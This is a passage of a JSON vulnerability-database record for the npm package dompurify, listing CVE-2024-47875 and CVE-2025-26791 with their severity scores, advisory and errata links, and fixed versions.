"https://access.redhat.com/errata/RHSA-2025:0654" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0875", "reference_id": "RHSA-2025:0875", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0875" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:18233", "reference_id": "RHSA-2025:18233", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:18233" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19003", "reference_id": "RHSA-2025:19003", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19003" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19017", "reference_id": "RHSA-2025:19017", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19017" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19047", "reference_id": "RHSA-2025:19047", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19047" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19058", "reference_id": "RHSA-2025:19058", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19058" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19306", "reference_id": "RHSA-2025:19306", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19306" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19314", "reference_id": "RHSA-2025:19314", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19314" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19895", "reference_id": "RHSA-2025:19895", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19895" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:22284", "reference_id": "RHSA-2025:22284", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:22284" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8544", "reference_id": "RHSA-2025:8544", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8544" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:8551", "reference_id": "RHSA-2025:8551", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:8551" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/371910?format=api", "purl": "pkg:npm/dompurify@2.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.2" } ], "aliases": [ "CVE-2024-48910", "GHSA-p3vf-v8qc-cwcr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wmjr-1h3n-hbhb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20937?format=api", "vulnerability_id": "VCID-z8n7-dz6p-zqfb", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47875", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72542", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72547", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72532", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00699", "scoring_system": "epss", "scoring_elements": "0.72455", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-47875" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875" }, { "reference_url": "http://seclists.org/fulldisclosure/2025/Apr/14", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://seclists.org/fulldisclosure/2025/Apr/14" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f", "reference_id": "0ef5e537a514f904b6aa1d7ad9e749e365d7185f", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983", "reference_id": "1084983", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318052", "reference_id": "2318052", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318052" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a", "reference_id": "6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47875", "reference_id": "CVE-2024-47875", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47875" }, { "reference_url": "https://github.com/advisories/GHSA-gx9m-whjm-85jf", "reference_id": "GHSA-gx9m-whjm-85jf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gx9m-whjm-85jf" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf", "reference_id": "GHSA-gx9m-whjm-85jf", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10236", "reference_id": "RHSA-2024:10236", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10236" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10988", "reference_id": "RHSA-2024:10988", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10988" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8327", "reference_id": "RHSA-2024:8327", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8327" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8678", "reference_id": "RHSA-2024:8678", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8678" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8683", "reference_id": "RHSA-2024:8683", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8683" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8981", "reference_id": "RHSA-2024:8981", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8981" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8991", "reference_id": "RHSA-2024:8991", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8991" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9473", "reference_id": "RHSA-2024:9473", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9473" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9620", "reference_id": "RHSA-2024:9620", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9620" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9629", "reference_id": "RHSA-2024:9629", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9629" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0329", "reference_id": "RHSA-2025:0329", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0329" }, { "reference_url": "https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098", "reference_id": "test-suite.js#L2098", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" }, { "value": "7.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/" } ], "url": "https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33800?format=api", "purl": "pkg:npm/dompurify@2.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/33396?format=api", "purl": "pkg:npm/dompurify@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3" } ], "aliases": [ "CVE-2024-47875", "GHSA-gx9m-whjm-85jf" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z8n7-dz6p-zqfb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23368?format=api", "vulnerability_id": "VCID-zaud-3sc4-ykcg", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-26791", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37901", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37914", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37888", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00168", "scoring_system": "epss", "scoring_elements": "0.37711", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-26791" }, { "reference_url": "https://ensy.zip/posts/dompurify-323-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://ensy.zip/posts/dompurify-323-bypass" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://nsysean.github.io/posts/dompurify-323-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nsysean.github.io/posts/dompurify-323-bypass" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26791", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26791" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325", "reference_id": "1098325", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345695", "reference_id": "2345695", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345695" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.2.4", "reference_id": "3.2.4", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.2.4" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02", "reference_id": "d18ffcb554e0001748865da03ac75dd7829f0f02", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02" }, { "reference_url": "https://ensy.zip/posts/dompurify-323-bypass/", "reference_id": "dompurify-323-bypass", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://ensy.zip/posts/dompurify-323-bypass/" }, { "reference_url": "https://nsysean.github.io/posts/dompurify-323-bypass/", "reference_id": "dompurify-323-bypass", "reference_type": "", "scores": [ { "value": "4.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/" } ], "url": "https://nsysean.github.io/posts/dompurify-323-bypass/" }, { "reference_url": "https://github.com/advisories/GHSA-vhxf-7vqr-mrjg", "reference_id": "GHSA-vhxf-7vqr-mrjg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vhxf-7vqr-mrjg" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:10020", "reference_id": "RHSA-2025:10020", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:10020" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:1875", "reference_id": "RHSA-2025:1875", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:1875" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:2518", "reference_id": "RHSA-2025:2518", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:2518" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3368", "reference_id": "RHSA-2025:3368", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3368" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3397", "reference_id": "RHSA-2025:3397", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3397" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:3886", "reference_id": "RHSA-2025:3886", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:3886" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:7626", "reference_id": "RHSA-2025:7626", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:7626" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2737", "reference_id": "RHSA-2026:2737", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2737" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2769", "reference_id": "RHSA-2026:2769", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2769" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3406", "reference_id": "RHSA-2026:3406", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3406" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/377348?format=api", "purl": "pkg:npm/dompurify@3.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.4" } ], "aliases": [ "CVE-2025-26791", "GHSA-vhxf-7vqr-mrjg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zaud-3sc4-ykcg" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.3" }